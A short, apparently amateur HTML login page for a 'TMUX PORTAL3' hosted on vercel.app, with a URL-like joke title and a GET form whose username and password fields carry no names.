<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" href="https://bluseworld.vercel.app/style.css">
<title>https://regible.vercel.app?get=login.coo/fartingases?=true?version=118.08.9/oauth=true/load?=true</title>
</head>
<body>
  <body>
    <div class="login-page">
      <div class="form">
        <div class="login">
          <div class="login-header">
            <h3>Login to TMUX PORTAL3</h3>
            <p>Enter your password. Dont know your password? Go to https://tmux-portal3.vercel.app/magma/newpassword</p>
          </div>
        </div>
        <form class="login-form" method="get" action="https://tmux-portal3.vercel.app/portal3assets/regibleV/home">
          <input type="text" placeholder="Username"/>
          <input type="password" placeholder="Password"/>
          <button>Log in</button>
          <p class="message">TMUX 2023-2024 REGIBLE V118.08.9</p>
        </form>
      </div>
    </div>
</body>
</body>
</html>